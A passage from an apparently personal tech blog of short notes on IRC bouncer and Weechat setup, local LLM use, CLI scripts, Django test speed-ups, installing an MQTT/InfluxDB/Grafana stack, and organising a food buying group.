    QuitMsg = See you :)
    RealName = N/A
    StatusPrefix = *
    TimestampFormat = [%H:%M:%S]

    <Network liberachat>
        FloodBurst = 9
        FloodRate = 2.00
        IRCConnectEnabled = true
        JoinDelay = 0
        LoadModule = simple_away
        RealName = N/A
        Server = irc.libera.chat +6697
        TrustAllCerts = false
        TrustPKI = true

        <Chan #peewee>
        </Chan>
    </Network>

    <Pass password>
        Hash = REDACTED
        Method = SHA256
        Salt = REDACTED
    </Pass>
</User>

You can access a web interface on the exposed port. I had to make a change in my Firefox configuration, in about:config, set network.security.ports.banned.override to 6697, otherwise, Firefox prevents you from connecting to these ports (which might actually be a good idea).

Weechat configuration

Now, to use this in weechat, here are some useful commands. First, get the fingerprint of the SSL certificate generated on your server:

cat /var/lib/znc/znc.pem | openssl x509 -sha512 -fingerprint -noout | tr -d ':' | tr 'A-Z' 'a-z' | cut -d = -f 2

Then, in weechat :

/server add znc host/6697 -tls -username=<username> -password=<yourpass> -autoconnect
/set irc.server.znc.tls_fingerprint <fingerprint-goes-here>
/connect znc

And you should be all set!

Resources : The ZNC Wiki on Weechat and the Debian page on ZNC

How to run the vigogne model locally

2023-09-22T00:00:00+02:00

Vigogne is an LLM based on LLAMA2, but trained with French data. As I’m working mostly in French, it might be useful. The current models that I can get locally are in English.

The information I’ve found online is scarce and not so easy to follow, so here is a step-by-step tutorial you can follow. I’m using pipenv almost everywhere now, it’s so easy :-)

llm install -U llm-llama-cpp
wget https://huggingface.co/TheBloke/Vigogne-2-7B-Chat-GGUF/resolve/main/vigogne-2-7b-chat.Q4_K_M.gguf
llm llama-cpp add-model vigogne-2-7b-chat.Q4_K_M.gguf -a vigogne
llm models default vigogne

Creating a simple command line to post snippets on Gitlab

2023-09-18T00:00:00+02:00

I’m trying to get away from Github, and one thing that I find useful is the gist utility they’re providing. Seems that gitlab provides a similar tool.

You can use it with python-gitlab:

pipx install python-gitlab

And then :

gitlab snippet create --title="youpi" --file-name="snip.py" --content snip.py --visibility="public"

I now wanted a small bash script which will just get the name of the file and infer all the parameters. I asked GPT-4, and iterated on its answer.

Here’s the resulting bash script:

#!/bin/bash

if [ -z "$1" ]
then
    echo "Please provide a filename"
    exit 1
fi

file="$1"
base=$(basename "$file")
title="$base"
visibility="public"

# Use `cat` to fetch the content of the file
content=$(cat "$file")

result=$(gitlab snippet create --title="$title" --file-name="$title" --content="$content" --visibility="$visibility")

id=$(echo "$result" | awk '/id: / { print $2 }')
echo "https://gitlab.com/-/snippets/$id"

I can now do snip README.md and that will create the snippet for me :-)

Creating an online space to share markdown files

2023-09-17T00:00:00+02:00

I wanted to create a space on my server where I can upload markdown files and have them rendered directly, for them to be shared with other people.

I stumbled on the markdown module for nginx which does exactly what I want, but it seemed to require compiling nginx, which wasn’t what I wanted in terms of maintainability (it would make updates complicated).

I then thought that the Caddy server does that by default, so I tested it out. Turns out it doesn’t, but it offers ways to do this thanks to its template mechanism.

It also sets up SSL certificates for you, automatically and transparently (using Let’s Encrypt!), so I wanted to have a look.

Here is the Caddy configuration file I’m now using :

md.notmyidea.org {
        root * /home/caddy/md.notmyidea.org
        rewrite * /index.html
        file_server
        templates
        encode zstd gzip

}

And the template:

{{$pathParts := splitList "/" .OriginalReq.URL.Path}}
{{$markdownFilename := default "index" (slice $pathParts 1 | join "/")}}

{{if not (fileExists $markdownFilename)}}
    {{httpError 404}}
{{end}}

{{$markdownFile := (include $markdownFilename | splitFrontMatter)}}
<!DOCTYPE html>
<html>
    <head>
        <title>{{ $markdownFilename }}</title>
    </head>
    <body>
        {{ markdown $markdownFile.Body }}
    </body>
</html>

This is a minimalistic version, but it works :-)

Converting an SVG file to favicon.ico

2023-09-13T00:00:00+02:00

Several websites can do this automatically, but I like doing things from my terminal, so here is a command that does it simply, using ImageMagick. Thanks to this gist.

convert -density 256x256 -background transparent favicon.svg -define icon:auto-resize -colors 256 favicon.ico

Discovering new development tools: LLM, Helix and more

2023-09-12T00:00:00+02:00

LLM

LocalAI lets you run models locally with the same HTTP API as OpenAI’s.
The Vigogne model is a model fine-tuned on French data. Notably this model, which takes LLAMA2 as its base.
LangChain seems to be a framework for working with the various useful concepts. To be explored.

For the first time, I started using the llm tool a bit more to help me with programming tasks.

!! warning I currently use OpenAI’s online “GPT-4” model by default, through their API. This raises ethical issues for me, but my approach for now is to see what kind of results I get, and then compare them with local models such as LLAMA2.

Two things I found useful:

git diff | llm "write me a commit message"
git diff | llm "find a branch name"

These can make life easier than describing things by hand (I find the branch name one particularly useful).

I also found the idea of automating test writing with pytest interesting. Of course it doesn’t do everything, but it gives a useful starting template:

cat code/test_file.py | llm "write tests for this, using pytest"

For example, I asked llm to list 20 titles for this article:

cat ~/dev/til.notmyidea.org/content/$(date +%F).md | llm "Liste moi 20 titres pour cet article. Quelque chose de simple"
1. "Découverte de nouveaux outils pour le développement: LLM, Helix et plus"
2. "Explorer les modèles LLM pour la génération de code"
3. "L'amélioration du développement grâce à LLM et Helix"
4. "Introduction à l'éditeur Helix et à LLM"
5. "Boostez votre productivité de développement avec LLM et Helix"
6. "Comment j'intègre LLM et Helix dans mon flux de travail de développement"
7. "Les avantages de l'utilisation de LLM pour la programmation"
8. "Approches innovantes pour le développement de code avec LLM"
9. "L'avenir du développement de code avec LLM et Helix"
10. "Optimisation des tâches de programmation avec LLM"
11. "Ouvrir de nouvelles possibilités de codage avec LLM et Helix"
12. "Utiliser des modèles LLM pour améliorer la qualité du code"

Helix

I’m starting to test the Helix editor a bit more. I’m used to Vim for all the small edits I make from my terminal, and Helix looks interesting.

x to select a line (xd to select and delete it)
ma to select “around” something; maw to select the word
c to delete the selection and switch to insert mode.

Miscellaneous

I trusted, I learned. (Thomas)

I really like what this says. Trusting may be necessary: even if we end up disappointed, we will at least have learned something. It moves me.

Running the Gitlab CI locally

2023-08-19T00:00:00+02:00

Sometimes I need to change how the continuous integration is set up, and I find myself pushing to a branch to test whether my changes work. It often takes me several commits to find the correct configuration, which is… suboptimal.

Today I discovered Gitlab CI local, which makes it possible to run the CI jobs locally, without having to push to the remote CI. The same thing exists for Microsoft GitHub.

Under the hood it uses Docker, so you need to have it running on your system, but once that’s done, you just have to issue a single command to see the results. Very helpful :-)

Here is an example:

$ gitlab-ci-local test
parsing and downloads finished in 41 ms
test  starting python:3.8-alpine (test)
test  copied to docker volumes in 4.05 s
test  $ apk update && apk add make libsass gcc musl-dev g++
test  > fetch https://dl-cdn.alpinelinux.org/alpine/v3.18/main/aarch64/APKINDEX.tar.gz
test  > fetch https://dl-cdn.alpinelinux.org/alpine/v3.18/community/aarch64/APKINDEX.tar.gz
test  > v3.18.3-55-g2ee93b9273a [https://dl-cdn.alpinelinux.org/alpine/v3.18/main]
test  > v3.18.3-56-g4a3b0382caa [https://dl-cdn.alpinelinux.org/alpine/v3.18/community]
test  > OK: 19939 distinct packages available
test  > (1/17) Installing libgcc (12.2.1_git20220924-r10)
test  > (2/17) Installing libstdc++ (12.2.1_git20220924-r10)
test  > (3/17) Installing libstdc++-dev (12.2.1_git20220924-r10)
test  > (4/17) Installing zstd-libs (1.5.5-r4)
test  > (5/17) Installing binutils (2.40-r7)
test  > (6/17) Installing libgomp (12.2.1_git20220924-r10)
test  > (7/17) Installing libatomic (12.2.1_git20220924-r10)
test  > (8/17) Installing gmp (6.2.1-r3)
test  > (9/17) Installing isl26 (0.26-r1)
test  > (10/17) Installing mpfr4 (4.2.0_p12-r0)
test  > (11/17) Installing mpc1 (1.3.1-r1)
test  > (12/17) Installing gcc (12.2.1_git20220924-r10)
test  > (13/17) Installing musl-dev (1.2.4-r1)
test  > (14/17) Installing libc-dev (0.7.2-r5)
test  > (15/17) Installing g++ (12.2.1_git20220924-r10)
test  > (16/17) Installing libsass (3.6.5-r0)
test  > (17/17) Installing make (4.4.1-r1)
test  > Executing busybox-1.36.1-r2.trigger
test  > OK: 246 MiB in 55 packages
test  $ pip install -r requirements.txt
test  > Collecting pelican
test  >   Downloading pelican-4.8.0-py3-none-any.whl (1.4 MB)
test  >      ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 1.4/1.4 MB 539.9 kB/s eta 0:00:00
test  > Collecting markdown
test  >   Downloading Markdown-3.4.4-py3-none-any.whl (94 kB)
test  >      ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 94.2/94.2 kB 540.1 kB/s eta 0:00:00
test  > Collecting typogrify
test  >   Downloading typogrify-2.0.7.tar.gz (12 kB)
test  >   Preparing metadata (setup.py): started
test  >   Preparing metadata (setup.py): finished with status 'done'
test  > Collecting pelican-search
test  >   Downloading pelican_search-1.1.0-py3-none-any.whl (6.6 kB)
test  > Collecting pelican-neighbors
test  >   Downloading pelican_neighbors-1.2.0-py3-none-any.whl (16 kB)
test  > Collecting pelican-webassets
test  >   Downloading pelican_webassets-2.0.0-py3-none-any.whl (5.8 kB)
test  > Collecting libsass
test  >   Downloading libsass-0.22.0.tar.gz (316 kB)
test  >      ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 316.3/316.3 kB 552.1 kB/s eta 0:00:00
test  >   Preparing metadata (setup.py): started
test  >   Preparing metadata (setup.py): finished with status 'done'
test  > Collecting docutils>=0.16
test  >   Downloading docutils-0.20.1-py3-none-any.whl (572 kB)
test  >      ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 572.7/572.7 kB 549.2 kB/s eta 0:00:00
test  > Collecting rich>=10.1
test  >   Downloading rich-13.5.2-py3-none-any.whl (239 kB)
test  >      ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 239.7/239.7 kB 485.3 kB/s eta 0:00:00
test  > Collecting jinja2>=2.7
test  >   Downloading Jinja2-3.1.2-py3-none-any.whl (133 kB)
test  >      ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 133.1/133.1 kB 342.6 kB/s eta 0:00:00
test  > Collecting pytz>=2020.1
test  >   Downloading pytz-2023.3-py2.py3-none-any.whl (502 kB)
test  >      ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 502.3/502.3 kB 547.3 kB/s eta 0:00:00
test  > Collecting pygments>=2.6
test  >   Downloading Pygments-2.16.1-py3-none-any.whl (1.2 MB)
test  >      ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 1.2/1.2 MB 551.4 kB/s eta 0:00:00
test  > Collecting unidecode>=1.1
test  >   Downloading Unidecode-1.3.6-py3-none-any.whl (235 kB)
test  >      ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 235.9/235.9 kB 554.2 kB/s eta 0:00:00
test  > Collecting blinker>=1.4
test  >   Downloading blinker-1.6.2-py3-none-any.whl (13 kB)
test  > Collecting python-dateutil>=2.8
test  >   Downloading python_dateutil-2.8.2-py2.py3-none-any.whl (247 kB)
test  >      ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 247.7/247.7 kB 235.7 kB/s eta 0:00:00
test  > Collecting feedgenerator>=1.9
test  >   Downloading feedgenerator-2.1.0-py3-none-any.whl (21 kB)
test  > Collecting importlib-metadata>=4.4
test  >   Downloading importlib_metadata-6.8.0-py3-none-any.whl (22 kB)
test  > Collecting smartypants>=1.8.3
test  >   Downloading smartypants-2.0.1-py2.py3-none-any.whl (9.9 kB)
test  > Collecting rtoml<0.10.0,>=0.9.0
test  >   Downloading rtoml-0.9.0-cp38-cp38-musllinux_1_1_aarch64.whl (846 kB)
test  >      ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 846.2/846.2 kB 503.7 kB/s eta 0:00:00
test  > Collecting webassets<3.0,>=2.0
test  >   Downloading webassets-2.0-py3-none-any.whl (142 kB)
test  >      ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 142.9/142.9 kB 551.8 kB/s eta 0:00:00
test  > Collecting zipp>=0.5
test  >   Downloading zipp-3.16.2-py3-none-any.whl (7.2 kB)
test  > Collecting MarkupSafe>=2.0
test  >   Downloading MarkupSafe-2.1.3-cp38-cp38-musllinux_1_1_aarch64.whl (30 kB)
test  > Collecting six>=1.5
test  >   Downloading six-1.16.0-py2.py3-none-any.whl (11 kB)
test  > Collecting markdown-it-py>=2.2.0
test  >   Downloading markdown_it_py-3.0.0-py3-none-any.whl (87 kB)
test  >      ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 87.5/87.5 kB 561.7 kB/s eta 0:00:00
test  > Collecting typing-extensions<5.0,>=4.0.0
test  >   Downloading typing_extensions-4.7.1-py3-none-any.whl (33 kB)
test  > Collecting mdurl~=0.1
test  >   Downloading mdurl-0.1.2-py3-none-any.whl (10.0 kB)
test  > Building wheels for collected packages: typogrify, libsass
test  >   Building wheel for typogrify (setup.py): started
test  >   Building wheel for typogrify (setup.py): finished with status 'done'
test  >   Created wheel for typogrify: filename=typogrify-2.0.7-py2.py3-none-any.whl size=13452 sha256=4ce329903e807671102eab7fd2bc49765b6efc3a4ae68c82053318b62789083c
test  >   Stored in directory: /root/.cache/pip/wheels/0b/e9/98/c888501e8dd2166da059e4f8418694de9b50b48a7192712be9
test  >   Building wheel for libsass (setup.py): started
test  >   Building wheel for libsass (setup.py): still running...
test  >   Building wheel for libsass (setup.py): finished with status 'done'
test  >   Created wheel for libsass: filename=libsass-0.22.0-cp38-abi3-linux_aarch64.whl size=13710320 sha256=3dcb4ce97c1aafc179a6343e0f312c17df88e56c4eb647ab54b09ead5ee00b92
test  >   Stored in directory: /root/.cache/pip/wheels/95/64/fa/47638d5037df216387cdc168e9871d5d9851fc995d636bd108
test  > Successfully built typogrify libsass
test  > Installing collected packages: webassets, smartypants, pytz, zipp, unidecode, typogrify, typing-extensions, six, rtoml, pygments, mdurl, MarkupSafe, libsass, feedgenerator, docutils, blinker, python-dateutil, markdown-it-py, jinja2, importlib-metadata, rich, markdown, pelican, pelican-webassets, pelican-search, pelican-neighbors
test  > Successfully installed MarkupSafe-2.1.3 blinker-1.6.2 docutils-0.20.1 feedgenerator-2.1.0 importlib-metadata-6.8.0 jinja2-3.1.2 libsass-0.22.0 markdown-3.4.4 markdown-it-py-3.0.0 mdurl-0.1.2 pelican-4.8.0 pelican-neighbors-1.2.0 pelican-search-1.1.0 pelican-webassets-2.0.0 pygments-2.16.1 python-dateutil-2.8.2 pytz-2023.3 rich-13.5.2 rtoml-0.9.0 six-1.16.0 smartypants-2.0.1 typing-extensions-4.7.1 typogrify-2.0.7 unidecode-1.3.6 webassets-2.0 zipp-3.16.2
test  > WARNING: Running pip as the 'root' user can result in broken permissions and conflicting behaviour with the system package manager. It is recommended to use a virtual environment instead: https://pip.pypa.io/warnings/venv
test  >
test  > [notice] A new release of pip is available: 23.0.1 -> 23.2.1
test  > [notice] To update, run: pip install --upgrade pip
test  $ make publish
test  > "pelican" "/gcl-builds/content" -o "/gcl-builds/public" -s "/gcl-builds/publishconf.py"
test  > Done: Processed 5 articles, 0 drafts, 0 hidden articles, 2 pages, 0 hidden pages
test  > and 0 draft pages in 0.50 seconds.
test  finished in 6 min
PASS  test

ArchLinux and updating the keyring

2023-08-18T00:00:00+02:00

I use yay for Arch updates. I only update semi-regularly, and sometimes, after a long gap, I end up with problems caused by outdated or missing keys.

When the system is used frequently, the problem doesn’t arise, because a service takes care of updating the keys automatically.

To fix the issue, you just need to update the archlinux-keyring package, as described on the relevant Wiki page.

sudo pacman -S archlinux-keyring

Python packaging with Hatch, pipx and Zsh environment variables

2023-08-17T00:00:00+02:00

It’s been a while since I last packaged something new. I recently remembered an old package of mine that needed some attention: debts. It’s now time to package it properly, which is how I discovered hatch.

hatch new --init

This does the heavy lifting for you, porting the setup.py file to the new way of packaging Python projects (with a pyproject.toml file).

Then hatch shell creates a development environment, installs the dependencies, checks the pyproject.toml file, and gives you a shell to test whatever you need, all in one command.

Isolating system packages

I discovered that pipx is a convenient way to install user-facing applications on my system. I use separate virtual environments for my different projects, but not for the tools that are installed system-wide.

pipx seems to solve this, and avoids resorting to sudo pip install x.

Manipulating env variables with Zsh

I’ve used Zsh as my main shell for years, and I just discovered that it makes manipulating environment variables easy.

If you’re like me, you never remember how to add something to your path. You can actually use +=, like this:

path+=('/Users/alexis/.local/bin')
export PATH

Profiling and speeding up Django and Pytest

2023-08-16T00:00:00+02:00

Éloi made a pull request on IHateMoney to speed up the tests, with some great tooling for pytest that I wasn’t aware of:

pytest-xdist runs tests in parallel, using -n auto
pytest-profiling makes it easy to get the call stack and find the function calls that take the most time.
You can then analyse the .prof files with Snakeviz
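To give an idea of what such a .prof file contains, here is a minimal sketch that produces one with the standard library’s cProfile and reads it back with pstats. As far as I understand, pytest-profiling relies on the same profiler, but treat that as an assumption; slow_sum and the file name are made up for the example.

```python
import cProfile
import pstats
import tempfile
from pathlib import Path


def slow_sum(n: int) -> int:
    """Deliberately naive function, so that it shows up in the profile."""
    return sum(i * i for i in range(n))


def profile_to_file(prof_path: Path) -> pstats.Stats:
    """Profile slow_sum(), dump the stats to prof_path and load them back."""
    profiler = cProfile.Profile()
    profiler.enable()
    slow_sum(200_000)
    profiler.disable()
    profiler.dump_stats(str(prof_path))
    return pstats.Stats(str(prof_path))


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        stats = profile_to_file(Path(tmp) / "example.prof")
        # Show the five entries with the highest cumulative time.
        stats.sort_stats("cumulative").print_stats(5)
```

The resulting file is the kind of input a viewer such as Snakeviz expects.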

So, I spent some time using these on the tests for La Chariotte, because they were slow.

I found two things:

Login calls are costly in the tests, and it’s possible to speed them up;
On my machine, calls to resolve my hostname were slow, taking 5s during the tests for a lookup that wasn’t even useful.

Changing the hashing algorithm to speed up tests

By default, Django uses a slow (but secure!) hashing mechanism to check user credentials. In the tests we don’t need this security, but we do need the speed.

Switching to MD5 turns out to speed them up greatly! Here is how to do it with a pytest fixture:

import pytest


@pytest.fixture(autouse=True)
def password_hasher_setup(settings):
    # "settings" is the fixture provided by pytest-django.
    # Use a weaker password hasher during tests, for speed
    settings.PASSWORD_HASHERS = [
        "django.contrib.auth.hashers.MD5PasswordHasher",
    ]
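To get a feel for the difference, here is a small stand-alone sketch that times a PBKDF2 derivation against a single MD5 digest, using only hashlib. It does not use Django’s hashers; the password, salt and iteration count are assumptions picked for the illustration (the count is only meant to be in the same range as recent Django defaults).

```python
import hashlib
import time

PASSWORD = b"correct horse battery staple"  # made-up password
SALT = b"test-salt"                         # made-up salt
ITERATIONS = 600_000  # assumption: same order of magnitude as recent Django defaults


def time_call(func) -> float:
    """Return the wall-clock time taken by one call to func()."""
    start = time.perf_counter()
    func()
    return time.perf_counter() - start


def compare() -> tuple[float, float]:
    """Return (pbkdf2_seconds, md5_seconds) for hashing the same password once."""
    slow = time_call(lambda: hashlib.pbkdf2_hmac("sha256", PASSWORD, SALT, ITERATIONS))
    fast = time_call(lambda: hashlib.md5(SALT + PASSWORD).hexdigest())
    return slow, fast


if __name__ == "__main__":
    slow, fast = compare()
    print(f"PBKDF2: {slow:.4f}s, MD5: {fast:.6f}s")
```

Every login in a test pays the slow cost once, which adds up quickly over a large test suite.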

Speeding up DNS lookups

I’m currently using a macOS machine, and for whatever reason the local hostname lookup was not configured properly on it. I don’t think I did anything specific to cause this, so it might be your case too. Calls to resolve the local hostname were taking 5s.

If the answers to scutil --get LocalHostName, hostname and scutil --get HostName differ, then you might be in this situation. Here is the fix:

sudo scutil --set HostName <YourHostName>
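A quick way to check whether you are affected is to time the lookup of your own hostname. This is a minimal sketch using only the socket module; it is one way of measuring the delay, not necessarily the call the test suite was making.

```python
import socket
import time


def time_local_lookup() -> tuple[str, float]:
    """Resolve this machine's own hostname and return (hostname, seconds taken)."""
    hostname = socket.gethostname()
    start = time.perf_counter()
    try:
        socket.gethostbyname(hostname)
    except OSError:
        pass  # the lookup failed; the elapsed time is still informative
    return hostname, time.perf_counter() - start


if __name__ == "__main__":
    name, elapsed = time_local_lookup()
    print(f"Resolving {name!r} took {elapsed:.3f}s")
```

If this takes several seconds before the fix and a few milliseconds after, the hostname configuration was the culprit.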

Installing Mosquitto, InfluxDB, Telegraf and Grafana

2022-08-29T00:00:00+02:00

Recently, I was asked to lend a hand installing a software stack that stores time series data and turns it into graphs.

Here are some notes taken during the installation, written so that people who don’t know much about the topic can find their way around.

The goal is to have Arduino boards regularly send data to a system that lets us store it and graph it.

For this, we are going to use:

A Mosquitto broker, which receives the data from the various clients and dispatches it to whoever needs it;
An InfluxDB database, which stores time series data;
A Telegraf agent, which takes the data from the broker and stores it in the InfluxDB database;
Grafana, a web application for visualising the data stored in InfluxDB.

Here is a summary of the steps I followed to set up the various pieces:

Installing and connecting to the server

In our case we went with a VPS at OVH running Debian 11, which has the merit of being a stable, well-known and (relatively) simple to use Linux distribution.

The lines below are command prompt lines, which you will often come across in documentation on the web. The $ sign marks the start of the command line, and the # sign marks the start of a comment.

In a terminal, you can connect using the following command:

$ ssh utilisateur@adresseip

Once connected, we update the software installed on the server.

$ sudo apt update # update the repositories (the list of available software).
$ sudo apt upgrade # update the software itself.

Configuring DNS

We will need two subdomains that point to the server. Of course, you need to replace ndd.tld with your own domain name:

mosquitto.ndd.tld
graphs.ndd.tld

To do this at OVH, go to the “OVH Cloud” console, then “Domain names”, and add two “A” records pointing to the server’s IP address.

Normally, OVH gives you the IP address. If in doubt, you can get it from the server with the ip a command.

Installing Mosquitto

$ sudo apt install mosquitto # install from the official repositories

Once it is installed, secure the installation with a username and a password.

$ sudo mosquitto_passwd -c /etc/mosquitto/passwd <username>

Then, in the configuration file, specify where the password file is. For editing, I recommend the nano text editor.

$ sudo nano /etc/mosquitto/mosquitto.conf

Here are the lines to add:

listener 1883
password_file /etc/mosquitto/passwd

Then restart the mosquitto service:

$ sudo systemctl restart mosquitto

Before mosquitto can be used, the OVH firewall has to be configured to let messages for the MQTT broker through.

Add a firewall rule that lets all TCP connections through, with the “established” option.

Let’s check that everything works as expected.

In one console, let’s listen…

$ mosquitto_sub -h mosquitto.ndd.tld -p 1883 -u <username> -P <password> -t topic

And in another one, let’s send a message:

$ mosquitto_pub -h mosquitto.ndd.tld -p 1883 -u <username> -P <password> -t topic -m 30

You should see “30” appear in the first console. If so, everything works!

Installing InfluxDB and Telegraf

Luckily, InfluxDB provides Debian packages directly in their own repository, which you add with these few lines:

sudo apt install -y gnupg2 curl wget
wget -qO- https://repos.influxdata.com/influxdb.key | sudo apt-key add -
echo "deb https://repos.influxdata.com/debian $(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/influxdb.list
sudo apt update

Then run sudo apt install influxdb telegraf to install them.

Next, start them now and tell the system to start them automatically at boot:

$ sudo systemctl enable --now influxdb
$ sudo systemctl enable --now telegraf

Configuring Telegraf

Telegraf makes the link between the messages sent to the MQTT broker and the InfluxDB database.

Here we need to get a bit more into the heart of the matter, and it depends on the messages you have to store.

In our case, we have three types of messages:

/BatVoltage, int
/Temperature, int
/GPS, string

Here is a configuration file, to be adapted to your data.

[global_tags]
[agent]
  interval = "10s"
  round_interval = true
  metric_batch_size = 1000
  metric_buffer_limit = 10000
  collection_jitter = "0s"
  flush_interval = "10s"
  flush_jitter = "0s"
  precision = "0s"
  hostname = ""
  omit_hostname = false

[[outputs.influxdb]]
  urls = ["http://127.0.0.1:8086"]
  database = "telegraf"

[[inputs.mqtt_consumer]]
    servers = ["tcp://127.0.0.1:1883"]
    name_override = "mqtt_consumer_float"
    topics = [
     "Topic/BatVoltage",
     "Topic/Temperature",
    ]
    username = "<username>"
    password = "<password>"
    data_format = "value"
    data_type = "integer"
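To make the role of data_format = "value" and data_type = "integer" more concrete, here is a rough Python sketch of what happens to one MQTT message: the payload is parsed as an integer and stored in a field named value, tagged with its topic. This illustrates the idea only; it is not Telegraf’s code, and it leaves out the host tag and the timestamp that a real point would carry.

```python
def escape_tag(value: str) -> str:
    """Escape the characters that are special in line-protocol tag values."""
    for char in (",", "=", " "):
        value = value.replace(char, "\\" + char)
    return value


def to_line_protocol(measurement: str, topic: str, payload: bytes) -> str:
    """Turn one MQTT payload into an InfluxDB line-protocol string (simplified)."""
    value = int(payload.decode().strip())  # data_type = "integer"
    # The trailing "i" marks the field as an integer in line protocol.
    return f"{measurement},topic={escape_tag(topic)} value={value}i"


if __name__ == "__main__":
    print(to_line_protocol("mqtt_consumer_float", "Topic/BatVoltage", b"30"))
```

A payload that is not a valid integer makes int() raise an error here, which is a reminder that string messages such as the GPS ones need their own input section with a different data type.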

Installing Grafana

sudo apt-get install -y apt-transport-https
sudo apt-get install -y software-properties-common wget
sudo wget -q -O /usr/share/keyrings/grafana.key https://packages.grafana.com/gpg.key
echo "deb [signed-by=/usr/share/keyrings/grafana.key] https://packages.grafana.com/oss/deb stable main" | sudo tee -a /etc/apt/sources.list.d/grafana.list
sudo apt update
sudo apt-get install grafana
sudo /bin/systemctl daemon-reload
sudo /bin/systemctl enable grafana-server
sudo /bin/systemctl start grafana-server

Nginx

sudo apt install nginx certbot python3-certbot-nginx

Then create a configuration file at /etc/nginx/sites-enabled/graphs.ndd.tld with the following content:

map $http_upgrade $connection_upgrade {
  default upgrade;
  '' close;
}

upstream grafana {
  server localhost:3000;
}

server {
  listen 80;
  server_name graphs.ndd.tld;
  root /usr/share/nginx/html;
  index index.html index.htm;

  location / {
    proxy_set_header Host $http_host;
    proxy_pass http://grafana;
  }

  # Proxy Grafana Live WebSocket connections.
  location /api/live/ {
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection $connection_upgrade;
    proxy_set_header Host $http_host;
    proxy_pass http://grafana;
  }
}

Once these configuration files are in place, remember to set up SSL, which gives you a secure (https) connection.

Just run this command and answer the questions it asks:

sudo certbot --nginx

That’s it! At this point everything should be working, and all that remains is to configure Grafana to graph the data stored in InfluxDB.

Buying groups & sharing our experience

2018-03-03T00:00:00+01:00

A few years ago, a group of friends and I got motivated to set up a buying group.

The idea is simple:

order in bulk, to bring prices down
do without intermediaries and favour short supply chains
go and meet local producers and talk with them

Our group currently serves 18 households and about 60 people.

Over the life of the group, we have developed a few tools to make things easier. Here is some feedback and a few tips and tools, in case you feel like starting one too :)

Organisation

We organise around three or four distributions a year. The modus operandi is as follows:

each producer has a contact person, who handles the relationship;
one person is designated to coordinate the distribution;
4 weeks before the distribution, the contact people update the prices and products in the order spreadsheet;
3 weeks before the distribution, orders open;
2 weeks before the distribution, orders close;
the contact people then have two weeks to collect the orders for the distribution.

Which products?

We try to stick to products that keep well (we also have a few fresher products, but with different arrangements).

Among others: beers, dried pulses, preserves, juices, honey, pasta, semolina, coffee, vinegars, potatoes, onions, oils, flours.

We try to buy local first, then organic from as close as possible, rather than necessarily looking for the lowest prices. This discussion comes up fairly often, so it is worth raising when the group is created, to have a clear position on the subject (not everyone is driven by the same ethics!).

Payments

For payments, we use cheques as much as possible. Each contact person pays the producer in their own name, and asks them to wait until the distribution date before cashing the cheque. Most producers accept being paid within a fortnight.

On distribution day, everyone brings their chequebook. We have set up a small script that works out the split of cheques automatically; each member ends up writing one or two cheques on average.

Each contact person is thus reimbursed for the amount they advanced, and each member of the buying group pays what they owe. We deliberately have no legal structure and no bank account. Payments are made directly between us.
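To illustrate the kind of computation involved, here is a minimal Python sketch of one possible way to split the cheques: a greedy matching of the people who owe the most with the people who are owed the most. It is not the script the group actually uses, and the names and amounts are invented.

```python
from decimal import Decimal


def settle(balances: dict[str, Decimal]) -> list[tuple[str, str, Decimal]]:
    """Return (payer, payee, amount) cheques that bring every balance to zero.

    A positive balance means the member advanced money and must be repaid;
    a negative one means the member still owes that amount.
    """
    if sum(balances.values()) != 0:
        raise ValueError("balances must sum to zero")
    creditors = sorted(
        ((name, bal) for name, bal in balances.items() if bal > 0),
        key=lambda item: item[1], reverse=True,
    )
    debtors = sorted(
        ((name, -bal) for name, bal in balances.items() if bal < 0),
        key=lambda item: item[1], reverse=True,
    )
    cheques = []
    i = j = 0
    while i < len(debtors) and j < len(creditors):
        debtor, owed = debtors[i]
        creditor, due = creditors[j]
        amount = min(owed, due)
        cheques.append((debtor, creditor, amount))
        debtors[i] = (debtor, owed - amount)
        creditors[j] = (creditor, due - amount)
        if debtors[i][1] == 0:
            i += 1  # this member has paid everything they owe
        if creditors[j][1] == 0:
            j += 1  # this member has been fully reimbursed
    return cheques


if __name__ == "__main__":
    example = {"Alice": Decimal("50"), "Bob": Decimal("-20"), "Chloe": Decimal("-30")}
    for payer, payee, amount in settle(example):
        print(f"{payer} writes a cheque of {amount} to {payee}")
```

With this approach nobody writes more cheques than necessary for their own balance, which fits the “one or two cheques per member” outcome described above, although a greedy match is not guaranteed to find the absolute minimum number of cheques.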

Transport

Each contact person orders the products, then takes care of bringing them back. In Rennes, we are lucky to have quite a few producers nearby, so it is fairly simple.

It is best to bring the products to the distribution place just before the distribution: this avoids storing them for too long, and avoids making producers wait too long before cashing the cheques.

For big orders the cars fill up well, but my little Clio is enough, let it be said!

The distribution

A little ahead of the distribution, the space has to be organised. One pile per member is prepared to make things easier on the day.

On the day itself, we get together, load up our goods, exchange a few cheques and chat! We take the opportunity to:

discuss the date of the next distribution;
find a new person to coordinate it;
discuss new products;
put the world to rights;
change the contact people for the producers.

And off we go again ;)

Our tools

We use an online spreadsheet to share prices and take orders. We tried ethercalc at first, but it did not work for us at the time (too many small bugs). So we went with Google Docs instead (ouch).

It is also fairly easy to add new features to it, so Fred and Rémy worked on a way to automate the split of cheques (which we first did by hand, rather painfully).

The system isn’t perfect, but it works quite well all the same!

So, a few resources:

the code that works out the split of cheques
a “fill in the blanks” version of our order spreadsheet (it is best to make a copy of it!).

Happy group buying ;)

Webnotes

2018-02-25T00:00:00+01:00

